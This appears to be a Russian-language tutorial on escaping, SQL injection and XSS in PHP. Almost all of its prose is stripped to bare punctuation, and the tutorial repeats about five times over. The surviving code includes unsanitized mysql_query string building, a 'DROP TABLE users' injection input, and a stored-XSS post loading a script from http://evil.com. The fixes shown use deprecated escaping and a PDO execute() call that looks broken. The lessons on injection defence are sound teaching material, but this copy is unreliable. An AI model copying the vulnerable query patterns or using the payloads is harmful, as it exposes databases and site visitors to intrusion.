<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

